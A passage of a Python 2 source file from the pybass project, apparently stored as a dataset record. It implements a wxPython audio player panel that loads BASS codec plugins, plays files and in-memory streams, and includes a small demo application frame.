pybass.BASS_ERROR_ALREADY:\n self.slider.Enable(False)\n self.btn_play.Enable(False)\n self.btn_stop.Enable(False)\n print('BASS_Init error %s' % pybass.get_error_description(bass_error_code))\n self.plugins = {}\n self.plugins['aac'] = (pybass.BASS_PluginLoad('bass_aac.dll', 0), '|AAC|*.aac')\n self.plugins['ac3'] = (pybass.BASS_PluginLoad('bass_ac3.dll', 0), '|AC3|*.ac3')\n self.plugins['aix'] = (pybass.BASS_PluginLoad('bass_aix.dll', 0), '|AIX|*.aix')\n 
self.plugins['ape'] = (pybass.BASS_PluginLoad('bass_ape.dll', 0), '|APE|*.ape')\n self.plugins['mpc'] = (pybass.BASS_PluginLoad('bass_mpc.dll', 0), '|MPC|*.mpc')\n self.plugins['ofr'] = (pybass.BASS_PluginLoad('bass_ofr.dll', 0), '|OFR|*.ofr')\n self.plugins['spx'] = (pybass.BASS_PluginLoad('bass_spx.dll', 0), '|SPX|*.spx')\n self.plugins['tta'] = (pybass.BASS_PluginLoad('bass_tta.dll', 0), '|TTA|*.tta')\n self.plugins['cda'] = (pybass.BASS_PluginLoad('basscd.dll', 0), '|CDA|*.cda')\n self.plugins['flac'] = (pybass.BASS_PluginLoad('bassflac.dll', 0), '|FLAC|*.flac')\n self.plugins['wma'] = (pybass.BASS_PluginLoad('basswma.dll', 0), '|WMA, WMV|*.wma;*.wmv')\n if pybassmidi:\n sound_font_file_name = 'CT4MGM.SF2'\n self.sound_font = pybassmidi.BASS_MIDI_FontInit(sound_font_file_name, 0)\n if self.sound_font == 0:\n print('BASS_MIDI_FontInit error %s (sound font file must be %s)' %\n (pybass.get_error_description(pybass.BASS_ErrorGetCode()), sound_font_file_name))\n else:\n self.plugins['midi'] = (pybass.BASS_PluginLoad('bassmidi.dll', 0), '|MID|*.mid')\n else:\n print('pybassmidi module not accessible')\n\n wx.Panel.__init__(self, *args, **kwargs)\n\n sizer_h = wx.BoxSizer(wx.HORIZONTAL)\n\n self.btn_play = wx.Button(self, wx.ID_ANY, _('Play'), style=wx.NO_BORDER)\n self.btn_play.SetToolTip(_('Play media data'))\n self.Bind(wx.EVT_BUTTON, self.event_play, self.btn_play)\n sizer_h.Add(self.btn_play)\n\n self.btn_stop = wx.Button(self, wx.ID_ANY, _('Stop'), style=wx.NO_BORDER)\n self.Bind(wx.EVT_BUTTON, self.event_stop, self.btn_stop)\n sizer_h.Add(self.btn_stop)\n\n self.btn_open = wx.Button(self, wx.ID_OPEN, _('Open'), style=wx.NO_BORDER)\n self.Bind(wx.EVT_BUTTON, self.event_open, self.btn_open)\n sizer_h.Add(self.btn_open)\n\n sizer_v = wx.BoxSizer(wx.VERTICAL)\n\n self.status_line = Ticker(self, fgcolor='#000062', bgcolor='#7F7F8F',\n start=False, ppf=1, fps=50, direction='ltr')\n sizer_v.Add(self.status_line, 0, wx.EXPAND)\n\n self.slider = slider_ctrl(self, wx.ID_ANY, 0, 0, 1)\n sizer_v.Add(self.slider, 0, wx.EXPAND)\n\n sizer_v.Add(sizer_h)\n\n self.SetSizer(sizer_v)\n self.SetAutoLayout(True)\n\n self.volume_slider = wx.Slider(self, wx.ID_ANY, pybass.BASS_GetVolume() * 100, 0, 100)\n self.Bind(wx.EVT_SCROLL, self.event_volume_slider, self.volume_slider)\n sizer_h.Add(self.volume_slider, 0, wx.EXPAND)\n\n self.method_check_controls()\n\n def method_load_file(self):\n import os\n wildcard = 'music sounds (MO3, IT, XM, S3M, MTM, MOD, UMX)|*.mo3;*.it;*.xm;*.s3m;*.mtm;*.mod;*.umx'\n wildcard += '|stream sounds (MP3, MP2, MP1, OGG, WAV, AIFF)|*.mp3;*.mp2;*.mp1;*.ogg;*.wav;*.aiff'\n for plugin in self.plugins.itervalues():\n if plugin[0] > 0:\n wildcard += plugin[1]\n wildcard += '|All files (*.*)|*.*'\n dlg = wx.FileDialog(self, message=_('Choose a file'), defaultDir=os.getcwd(),\n defaultFile='', wildcard=wildcard, style=wx.FD_OPEN | wx.FD_CHANGE_DIR)\n if dlg.ShowModal() == wx.ID_OK:\n self.name_stream = file_name = dlg.GetPath()\n if os.path.isfile(file_name):\n flags = 0\n if isinstance(file_name, unicode):\n flags |= pybass.BASS_UNICODE\n try:\n pybass.BASS_CHANNELINFO._fields_.remove(('filename', pybass.ctypes.c_char_p))\n except Exception:\n pass\n else:\n pybass.BASS_CHANNELINFO._fields_.append(('filename', pybass.ctypes.c_wchar_p))\n error_msg = 'BASS_StreamCreateFile error %s'\n new_bass_handle = 0\n if dlg.GetFilterIndex() == 0: # BASS_CTYPE_MUSIC_MOD\n flags |= pybass.BASS_MUSIC_PRESCAN\n new_bass_handle = pybass.BASS_MusicLoad(False, file_name, 0, 0, flags, 0)\n error_msg = 
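The player initializer above registers each BASS add-on with its own BASS_PluginLoad call and keeps (handle, wildcard) pairs in self.plugins. A table-driven version of the same setup; the DLL names and wildcard strings are taken from the record, and the sketch naturally runs only where pybass and the DLLs are available:

import pybass

PLUGIN_TABLE = {
    'aac': ('bass_aac.dll', '|AAC|*.aac'),
    'flac': ('bassflac.dll', '|FLAC|*.flac'),
    'wma': ('basswma.dll', '|WMA, WMV|*.wma;*.wmv'),
}

def load_plugins(table):
    # keep (handle, wildcard) per plugin so failed loads stay inspectable
    loaded = {}
    for name, (dll, wildcard) in table.items():
        handle = pybass.BASS_PluginLoad(dll, 0)
        if handle == 0:
            print('%s failed: %s' % (dll,
                  pybass.get_error_description(pybass.BASS_ErrorGetCode())))
        loaded[name] = (handle, wildcard)
    return loaded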
'BASS_MusicLoad error %s'\n else: # other sound types\n new_bass_handle = pybass.BASS_StreamCreateFile(False, file_name, 0, 0, flags)\n if new_bass_handle == 0:\n print(error_msg % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n else:\n self.method_stop_audio()\n self.bass_handle = new_bass_handle\n self.stream = None\n self.method_slider_set_range()\n self.method_check_controls()\n\n def method_load_wav_file(self):\n import os\n wildcard = 'wav (*.wav)|*.wav|All files (*.*)|*.*'\n dlg = wx.FileDialog(self, message=_('Choose a file'), defaultDir=os.getcwd(),\n defaultFile='', wildcard=wildcard, style=wx.OPEN | wx.CHANGE_DIR)\n if dlg.ShowModal() == wx.ID_OK:\n self.name_stream = file_name = dlg.GetPath()\n if os.path.isfile(file_name):\n flags = 0\n if isinstance(file_name, unicode):\n flags |= pybass.BASS_UNICODE\n try:\n pybass.BASS_CHANNELINFO._fields_.remove(('filename', pybass.ctypes.c_char_p))\n except Exception:\n pass\n else:\n pybass.BASS_CHANNELINFO._fields_.append(('filename', pybass.ctypes.c_wchar_p))\n\n def stream_callback(handle, buffer, length, user):\n b = pybass.ctypes.cast(buffer, pybass.ctypes.c_char_p)\n pybass.ctypes.memset(b, 0, length)\n data = pybass.ctypes.c_char_p(self.stream.read(length))\n pybass.ctypes.memmove(b, data, length)\n if self.stream.is_eof():\n length |= pybass.BASS_STREAMPROC_END\n self.stream.current_position = 0\n return length\n self.stream_callback = stream_callback\n self.user_func = pybass.STREAMPROC(self.stream_callback)\n self.stream = memory_stream(open(file_name, 'rb').read(), file_name)\n new_bass_handle = pybass.BASS_StreamCreate(44100, 2, flags, self.user_func, 0)\n if new_bass_handle == 0:\n print('BASS_StreamCreate error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n else:\n self.method_stop_audio()\n self.bass_handle = new_bass_handle\n self.stream = None\n self.method_slider_set_range()\n self.method_check_controls()\n\n def method_load_data(self, stream, name_stream='memory_stream'):\n if stream is not None:\n if isinstance(stream, (str, list, tuple, buffer)):\n self.stream = memory_stream(stream, name_stream)\n else:\n self.stream = stream\n if isinstance(self.stream, memory_stream):\n system = pybass.STREAMFILE_BUFFER\n flags = 0\n\n def callback_close(user):\n self.stream.current_position = 0\n self.callback_close = callback_close\n\n def callback_length(user):\n return len(self.stream.data)\n self.callback_length = callback_length\n\n def callback_read(buffer, length, user):\n b = pybass.ctypes.cast(buffer, pybass.ctypes.c_char_p)\n pybass.ctypes.memset(b, 0, length)\n data = pybass.ctypes.c_char_p(self.stream.read(length))\n pybass.ctypes.memmove(b, data, length)\n return length\n self.callback_read = callback_read\n\n def callback_seek(offset, user):\n self.stream.seek(offset)\n return True\n self.callback_seek = callback_seek\n self.bass_file_procs = pybass.BASS_FILEPROCS()\n self.bass_file_procs.close = pybass.FILECLOSEPROC(self.callback_close)\n self.bass_file_procs.length = pybass.FILELENPROC(self.callback_length)\n self.bass_file_procs.read = pybass.FILEREADPROC(self.callback_read)\n self.bass_file_procs.seek = pybass.FILESEEKPROC(self.callback_seek)\n new_bass_handle = pybass.BASS_StreamCreateFileUser(\n system, flags, self.bass_file_procs, id(self.stream.data))\n if new_bass_handle == 0:\n print('BASS_StreamCreateFileUser error %s' %\n pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n else:\n self.method_stop_audio()\n self.bass_handle = new_bass_handle\n channel_info = 
self.method_get_channel_info()\n if channel_info.ctype == pybass.BASS_CTYPE_STREAM_OGG:\n import pyogginfo\n ogg_info = pyogginfo.VorbisStreamInfo()\n stream = pyogginfo.SimpleDemultiplexer(ogg_info)\n if isinstance(self.stream.data, str):\n stream.process(self.stream.data)\n else:\n stream.process(str(self.stream.data))\n self.stream.decode_length = ogg_info.lastPosition\n self.stream.seconds = ogg_info.stop\n try:\n for key, value in ogg_info.comments.comments:\n if key == 'TITLE':\n if value.strip() > '':\n self.stream.name = value\n except Exception:\n pass\n self.method_slider_set_range()\n self.method_check_controls()\n\n def method_get_channel_info(self):\n channel_info = pybass.BASS_CHANNELINFO()\n if not pybass.BASS_ChannelGetInfo(self.bass_handle, channel_info):\n print('BASS_ChannelGetInfo error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n return channel_info\n\n def method_get_state(self):\n return pybass.BASS_ChannelIsActive(self.bass_handle)\n\n def method_get_length(self):\n result = pybass.BASS_ChannelGetLength(self.bass_handle, pybass.BASS_POS_BYTE)\n if result <= 0 and isinstance(self.stream, memory_stream):\n result = self.stream.decode_length\n return result\n\n def method_get_position(self):\n return pybass.BASS_ChannelGetPosition(self.bass_handle, pybass.BASS_POS_BYTE)\n\n def method_set_position(self, value):\n if not pybass.BASS_ChannelSetPosition(self.bass_handle, value, pybass.BASS_POS_BYTE):\n print('BASS_ChannelSetPosition error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n\n def method_slider_set_range(self):\n self.slider.SetRange(0, self.method_get_length())\n\n def method_check_controls(self):\n if self.bass_handle:\n self.slider.Enable(True)\n self.btn_play.Enable(True)\n if self.method_get_state() == pybass.BASS_ACTIVE_STOPPED:\n self.btn_stop.Enable(False)\n else:\n self.btn_stop.Enable(True)\n\n if hasattr(self.stream, 'name'):\n text = self.stream.name + ' (' + pybass.seconds_to_string(self.stream.seconds) + ')'\n else:\n # ~ channel_info = self.method_get_channel_info()\n # ~ text = channel_info.filename\n text = self.name_stream + ' (' + pybass.stream_length_as_hms(self.bass_handle) + ')'\n self.status_line.SetText(text)\n if self.status_line.GetText() != '':\n self.status_line.Start()\n else:\n self.slider.Enable(False)\n self.btn_play.Enable(False)\n self.btn_stop.Enable(False)\n if self.status_line.GetText() == '':\n if self.status_line.IsTicking():\n self.status_line.Stop()\n\n def method_is_end(self):\n return self.method_get_state() == pybass.BASS_ACTIVE_STOPPED and self.method_get_position() == 0\n\n def method_play(self):\n if self.bass_handle:\n if self.method_get_state() in (pybass.BASS_ACTIVE_STOPPED, pybass.BASS_ACTIVE_PAUSED):\n if not pybass.BASS_ChannelPlay(self.bass_handle, False):\n print('BASS_ChannelPlay error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n else:\n self.slider.timer_start()\n self.btn_play.SetLabel(_('Pause'))\n self.btn_stop.Enable(True)\n else:\n if not pybass.BASS_ChannelPause(self.bass_handle):\n print('BASS_ChannelPause error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n else:\n self.slider.timer_stop()\n self.btn_play.SetLabel(_('Unpause'))\n\n def event_volume_slider(self, event):\n pybass.BASS_SetVolume(event.GetPosition() / 100.0)\n\n def event_play(self, event):\n self.method_play()\n\n def event_open(self, event):\n self.method_load_file()\n\n def event_stop(self, event):\n self.method_stop_audio()\n\n def 
method_stop_audio(self):\n self.method_stop_audio_stream()\n self.btn_play.SetLabel(_('Play'))\n self.slider.SetValue(0)\n self.btn_stop.Enable(False)\n\n def method_stop_audio_stream(self):\n self.slider.timer_stop()\n if self.bass_handle:\n if not pybass.BASS_ChannelStop(self.bass_handle):\n print('BASS_ChannelStop error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n else:\n self.method_set_position(0)\n\n def method_free_handle(self):\n if self.bass_handle:\n channel_info = self.method_get_channel_info()\n if channel_info.ctype >= pybass.BASS_CTYPE_MUSIC_MOD:\n if not pybass.BASS_MusicFree(self.bass_handle):\n print('BASS_MusicFree error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n else:\n self.bass_handle = 0\n elif channel_info.ctype >= pybass.BASS_CTYPE_STREAM:\n if not pybass.BASS_StreamFree(self.bass_handle):\n print('BASS_StreamFree error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n else:\n self.bass_handle = 0\n\n def method_reset(self):\n self.method_free_handle()\n self.status_line.SetText('')\n self.method_check_controls()\n\n def __del__(self):\n self.method_free_handle()\n if self.sound_font != 0 and pybassmidi:\n if pybassmidi.BASS_MIDI_FontFree(self.sound_font):\n print('BASS_MIDI_FontFree error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n for plugin in self.plugins.itervalues():\n if plugin[0] > 0:\n if pybass.BASS_PluginFree(plugin[0]):\n print('BASS_PluginFree error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n\n\nif __name__ == '__main__':\n import os\n import gettext\n from locale import getdefaultlocale, setlocale, LC_ALL\n from wx.lib.agw.aui import AuiManager\n from wx.lib.agw.aui import AuiPaneInfo\n # from wx.lib.agw.aui import AuiToolBar\n # from wx.lib.agw.aui import AUI_TB_DEFAULT_STYLE\n # from wx.lib.agw.aui import AUI_TB_OVERFLOW\n from wx.html import HtmlHelpController\n setlocale(LC_ALL, '')\n\n class log_ctrl(wx.TextCtrl):\n\n def __init__(self, *args, **kwargs):\n self.file_name = kwargs.pop('file_name', 'log.txt')\n self.main_frame = kwargs.pop('main_frame', None)\n self.add_to_file = kwargs.pop('add_to_file', False)\n if self.main_frame is None:\n self.main_frame = args[0]\n super(log_ctrl, self).__init__(*args, **kwargs)\n\n def __write__(self, content):\n self.WriteText(content)\n\n def show_control(self, ctrl_name='log_ctrl'):\n if self.main_frame is not None:\n if hasattr(self.main_frame, 'aui_manager'):\n self.main_frame.show_aui_pane_info(ctrl_name)\n self.SetInsertionPointEnd()\n if self.add_to_file:\n self.flush()\n\n def write(self, content):\n self.show_control()\n self.__write__(content)\n\n def writelines(self, l):\n self.show_control()\n map(self.__write__, l)\n\n def flush(self):\n self.SaveFile(self.file_name)\n\n class main_frame(wx.Frame):\n\n def __init__(self, *args, **kwargs):\n self.app = kwargs.pop('app', None)\n wx.Frame.__init__(self, *args, **kwargs)\n # =============== Logging Text Control ================\n self.log_ctrl = log_ctrl(self, style=wx.TE_MULTILINE, add_to_file=True)\n sys.stdout = self.log_ctrl\n sys.stderr = self.log_ctrl\n self.log = wx.LogTextCtrl(self.log_ctrl)\n self.log.SetLogLevel(wx.LOG_Error)\n # ~ wx.Log_SetActiveTarget(self.log)\n # =============== player Control ================\n self.player = player_ctrl(self)\n # =============== StatusBar ================\n statusbar = self.CreateStatusBar(2)\n statusbar.SetStatusWidths([-1, -1])\n statusbar.SetStatusText(_('Welcome into application!'), 0)\n # 
=============== AuiManager ================\n self.aui_manager = AuiManager()\n self.aui_manager.SetManagedWindow(self)\n self.aui_manager.AddPane(self.player, AuiPaneInfo().Name('player').CenterPane())\n self.aui_manager.AddPane(self.log_ctrl, AuiPaneInfo().Name(\n 'log_ctrl').Bottom().Layer(0).BestSize((100, 100)).Hide())\n if self.log_ctrl.GetValue() != '':\n self.aui_manager.GetPane('log_ctrl').Show()\n self.aui_manager.Update()\n\n def DoUpdate(self):\n self.aui_manager.Update()\n\n def show_aui_pane_info(self, name):\n if not self.aui_manager.GetPane(name).IsShown():\n self.aui_manager.GetPane(name).Show()\n self.aui_manager.Update()\n\n def show_hide_aui_pane_info(self, name):\n if self.aui_manager.GetPane(name).IsShown():\n self.aui_manager.GetPane(name).Hide()\n else:\n self.aui_manager.GetPane(name).Show()\n self.aui_manager.Update()\n\n # ~ class application(wx.PySimpleApp):\n class application(wx.App):\n app_version = '0.4'\n app_path = os.getcwd()\n app_name = os.path.basename(sys.argv[0].split('.')[0])\n help_file = app_path + '/' + app_name + '.htb'\n settings_name = app_path + '/' + app_name + '.cfg'\n\n def start(self):\n result = True\n self.help_file = self.app_name + '.htb'\n # SETUP LANGUAGE\n lang_catalog = getdefaultlocale()[0]\n list_trans = []\n current_trans = -1\n i = 0\n if os.path.exists('lang/%s' % lang_catalog):\n for dir_name in os.listdir('lang'):\n if os.path.exists('lang/%s/%s.mo' % (dir_name, self.app_name)):\n if dir_name == lang_catalog:\n current_trans = i\n self.help_file = 'lang/' + dir_name + '/' + self.help_file\n list_trans.append(gettext.GNUTranslations(\n open('lang/%s/%s.mo' % (dir_name, self.app_name), 'rb')))\n i += 1\n if len(list_trans) > 0:\n try:\n list_trans[current_trans].install(unicode=True) # wx.USE_UNICODE\n except Exception:\n print_error()\n if current_trans == -1:\n trans = gettext.NullTranslations()\n trans.install(unicode=True) # wx.USE_UNICODE\n # SETUP WX LANGUAGE TRANSLATION TO OS DEFAULT LANGUAGE\n # WX DIRECTORY MUST BE TO CONTAIN LANG DIRECTORY\n self.locale = wx.Locale(wx.LANGUAGE_DEFAULT)\n # CHECK EXISTS INSTANCE\n name_user = wx.GetUserId()\n name_instance = self.app_name + '::'\n self.instance_checker = wx.SingleInstanceChecker(name_instance + name_user)\n if self.instance_checker.IsAnotherRunning():\n wx.MessageBox(_('Software is already running.'), _('Warning'))\n return False\n # CREATE HTML HELP CONTROLLER\n # ~ wx.FileSystem.AddHandler(wx.ZipFSHandler())\n self.help_controller = HtmlHelpController()\n if os.path.exists(self.help_file):\n self.help_controller.AddBook(self.help_file)\n # ABOUT APPLICATION\n self.developers = [_('Maxim Kolosov')]\n self.copyright = _('(C) 2013 Max Kolosov')\n self.web_site = ('http://pybass.sf.net', _('Home page'))\n self.email = ('mailto:pyirrlicht@gmail.com', _('email for feedback'))\n self.license = _('BSD license')\n self.about_description = _('wxPython bass music player.')\n # CREATE MAIN FRAME\n self.main_frame = main_frame(None, wx.ID_ANY, self.app_name, app=self)\n self.SetTopWindow(self.main_frame)\n self.main_frame.Show()\n return result\n\n def OnExit(self):\n try:\n del self.instance_checker\n except Exception:\n print_error()\n\n app = application(0)\n if app.start():\n app.MainLoop()\n else:\n app.OnExit()\n", "sub_path": "source/pybass/wx_ctrl_phoenix.py", "file_name": "wx_ctrl_phoenix.py", "file_ext": "py", "file_size_in_byte": 26415, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": 
"sys.exc_info", "line_number": 26, "usage_type": "call"}, {"api_name": "wx.Slider", "line_number": 80, "usage_type": "attribute"}, {"api_name": "wx.Slider.__init__", "line_number": 85, "usage_type": "call"}, {"api_name": "wx.Slider", "line_number": 85, "usage_type": "attribute"}, {"api_name": "wx.Timer", "line_number": 86, "usage_type": "call"}, {"api_name": "wx.EVT_LEFT_DOWN", "line_number": 87, "usage_type": "attribute"}, {"api_name": "wx.EVT_LEFT_UP", "line_number": 88, "usage_type": "attribute"}, {"api_name": "wx.EVT_TIMER", "line_number": 89, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 119, "usage_type": "attribute"}, {"api_name": "pybass.BASS_Init", "line_number": 128, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 130, "usage_type": "call"}, {"api_name": "pybass.BASS_ERROR_ALREADY", "line_number": 131, "usage_type": "attribute"}, {"api_name": "pybass.get_error_description", "line_number": 135, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 137, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 138, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 139, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 140, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 141, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 142, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 143, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 144, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 145, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 146, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 147, "usage_type": "call"}, {"api_name": "pybassmidi.BASS_MIDI_FontInit", "line_number": 150, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 153, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 153, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 155, "usage_type": "call"}, {"api_name": "wx.Panel.__init__", "line_number": 159, "usage_type": "call"}, {"api_name": "wx.Panel", "line_number": 159, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 161, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 161, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 163, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 163, "usage_type": "attribute"}, {"api_name": "wx.NO_BORDER", "line_number": 163, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 165, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 168, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 168, "usage_type": "attribute"}, {"api_name": "wx.NO_BORDER", "line_number": 168, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 169, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 172, "usage_type": "call"}, {"api_name": "wx.ID_OPEN", "line_number": 172, "usage_type": "attribute"}, {"api_name": "wx.NO_BORDER", "line_number": 172, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 173, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 176, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 176, 
"usage_type": "attribute"}, {"api_name": "wx.lib.ticker.Ticker", "line_number": 178, "usage_type": "call"}, {"api_name": "wx.EXPAND", "line_number": 180, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 182, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 183, "usage_type": "attribute"}, {"api_name": "wx.Slider", "line_number": 190, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 190, "usage_type": "attribute"}, {"api_name": "pybass.BASS_GetVolume", "line_number": 190, "usage_type": "call"}, {"api_name": "wx.EVT_SCROLL", "line_number": 191, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 192, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 204, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 204, "usage_type": "call"}, {"api_name": "wx.FD_OPEN", "line_number": 205, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 205, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 208, "usage_type": "call"}, {"api_name": "os.path", "line_number": 208, "usage_type": "attribute"}, {"api_name": "pybass.BASS_UNICODE", "line_number": 211, "usage_type": "attribute"}, {"api_name": "pybass.BASS_CHANNELINFO._fields_.remove", "line_number": 213, "usage_type": "call"}, {"api_name": "pybass.BASS_CHANNELINFO", "line_number": 213, "usage_type": "attribute"}, {"api_name": "pybass.ctypes", "line_number": 213, "usage_type": "attribute"}, {"api_name": "pybass.BASS_CHANNELINFO._fields_.append", "line_number": 217, "usage_type": "call"}, {"api_name": "pybass.BASS_CHANNELINFO", "line_number": 217, "usage_type": "attribute"}, {"api_name": "pybass.ctypes", "line_number": 217, "usage_type": "attribute"}, {"api_name": "pybass.BASS_MUSIC_PRESCAN", "line_number": 221, "usage_type": "attribute"}, {"api_name": "pybass.BASS_MusicLoad", "line_number": 222, "usage_type": "call"}, {"api_name": "pybass.BASS_StreamCreateFile", "line_number": 225, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 227, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 227, "usage_type": "call"}, {"api_name": "wx.FileDialog", "line_number": 238, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 238, "usage_type": "call"}, {"api_name": "wx.OPEN", "line_number": 239, "usage_type": "attribute"}, {"api_name": "wx.CHANGE_DIR", "line_number": 239, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 240, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 242, "usage_type": "call"}, {"api_name": "os.path", "line_number": 242, "usage_type": "attribute"}, {"api_name": "pybass.BASS_UNICODE", "line_number": 245, "usage_type": "attribute"}, {"api_name": "pybass.BASS_CHANNELINFO._fields_.remove", "line_number": 247, "usage_type": "call"}, {"api_name": "pybass.BASS_CHANNELINFO", "line_number": 247, "usage_type": "attribute"}, {"api_name": "pybass.ctypes", "line_number": 247, "usage_type": "attribute"}, {"api_name": "pybass.BASS_CHANNELINFO._fields_.append", "line_number": 251, "usage_type": "call"}, {"api_name": "pybass.BASS_CHANNELINFO", "line_number": 251, "usage_type": "attribute"}, {"api_name": "pybass.ctypes", "line_number": 251, "usage_type": "attribute"}, {"api_name": "pybass.ctypes.cast", "line_number": 254, "usage_type": "call"}, {"api_name": "pybass.ctypes", "line_number": 254, "usage_type": "attribute"}, 
{"api_name": "pybass.ctypes.memset", "line_number": 255, "usage_type": "call"}, {"api_name": "pybass.ctypes", "line_number": 255, "usage_type": "attribute"}, {"api_name": "pybass.ctypes.c_char_p", "line_number": 256, "usage_type": "call"}, {"api_name": "pybass.ctypes", "line_number": 256, "usage_type": "attribute"}, {"api_name": "pybass.ctypes.memmove", "line_number": 257, "usage_type": "call"}, {"api_name": "pybass.ctypes", "line_number": 257, "usage_type": "attribute"}, {"api_name": "pybass.BASS_STREAMPROC_END", "line_number": 259, "usage_type": "attribute"}, {"api_name": "pybass.STREAMPROC", "line_number": 263, "usage_type": "call"}, {"api_name": "pybass.BASS_StreamCreate", "line_number": 265, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 267, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 267, "usage_type": "call"}, {"api_name": "pybass.STREAMFILE_BUFFER", "line_number": 282, "usage_type": "attribute"}, {"api_name": "pybass.ctypes.cast", "line_number": 294, "usage_type": "call"}, {"api_name": "pybass.ctypes", "line_number": 294, "usage_type": "attribute"}, {"api_name": "pybass.ctypes.memset", "line_number": 295, "usage_type": "call"}, {"api_name": "pybass.ctypes", "line_number": 295, "usage_type": "attribute"}, {"api_name": "pybass.ctypes.c_char_p", "line_number": 296, "usage_type": "call"}, {"api_name": "pybass.ctypes", "line_number": 296, "usage_type": "attribute"}, {"api_name": "pybass.ctypes.memmove", "line_number": 297, "usage_type": "call"}, {"api_name": "pybass.ctypes", "line_number": 297, "usage_type": "attribute"}, {"api_name": "pybass.BASS_FILEPROCS", "line_number": 305, "usage_type": "call"}, {"api_name": "pybass.FILECLOSEPROC", "line_number": 306, "usage_type": "call"}, {"api_name": "pybass.FILELENPROC", "line_number": 307, "usage_type": "call"}, {"api_name": "pybass.FILEREADPROC", "line_number": 308, "usage_type": "call"}, {"api_name": "pybass.FILESEEKPROC", "line_number": 309, "usage_type": "call"}, {"api_name": "pybass.BASS_StreamCreateFileUser", "line_number": 310, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 314, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 314, "usage_type": "call"}, {"api_name": "pybass.BASS_CTYPE_STREAM_OGG", "line_number": 319, "usage_type": "attribute"}, {"api_name": "pyogginfo.VorbisStreamInfo", "line_number": 321, "usage_type": "call"}, {"api_name": "pyogginfo.SimpleDemultiplexer", "line_number": 322, "usage_type": "call"}, {"api_name": "pybass.BASS_CHANNELINFO", "line_number": 340, "usage_type": "call"}, {"api_name": "pybass.BASS_ChannelGetInfo", "line_number": 341, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 342, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 342, "usage_type": "call"}, {"api_name": "pybass.BASS_ChannelIsActive", "line_number": 346, "usage_type": "call"}, {"api_name": "pybass.BASS_ChannelGetLength", "line_number": 349, "usage_type": "call"}, {"api_name": "pybass.BASS_POS_BYTE", "line_number": 349, "usage_type": "attribute"}, {"api_name": "pybass.BASS_ChannelGetPosition", "line_number": 355, "usage_type": "call"}, {"api_name": "pybass.BASS_POS_BYTE", "line_number": 355, "usage_type": "attribute"}, {"api_name": "pybass.BASS_ChannelSetPosition", "line_number": 358, "usage_type": "call"}, {"api_name": "pybass.BASS_POS_BYTE", "line_number": 358, "usage_type": "attribute"}, {"api_name": "pybass.get_error_description", 
